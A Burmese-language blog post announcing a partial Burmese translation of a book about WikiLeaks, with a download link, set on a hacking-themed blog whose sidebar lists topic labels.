၀ိကိလိခ္၏ အတြင္းေရးမ်ား ဆိုတဲ႔ စာအုပ္ကို MCM မွ ကို Giacomo က ဘာသာၿပန္ၿပီး တင္ေပးထားတာၿဖစ္ပါတယ္ ။ ဒီလိုစာအုပ္မ်ိဳးကို ဘာသာၿပန္ၿပီး တင္ေပးဖို႔ဆိုတာ ေတာ္ေတာ္ အားထည့္မွ ရတဲ႔ အလုပ္တစ္ခုပါ ... အခန္း ( ၂၁ ) ခန္းရွိတာ ခုက ( ၁ ) ကေန (၇ ) ထိပါ အခန္း ( ၈ ) ေတာ႔ ၿပီးေနၿပီလို႔ ေၿပာပါတယ္ ။ တင္ထားတာေတာ႔ မေတြ႕မိေသးဘူး... စိတ္၀င္စားဖို႔လည္း ေကာင္းသလို Internet Security နဲ႔ ပက္သက္ၿပီး ကမာကို ကိုင္လွုပ္ခဲ႔တဲ႔ လူေတြ ၿဖစ္လို႔ ပိုၿပီး စိတ္၀င္စားဖို႔ ေကာင္းပါတယ္

Download

http://www.mediafire.com/?y34ckt9u6hvujyq
 
ref:MHU 
Read More ->>

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology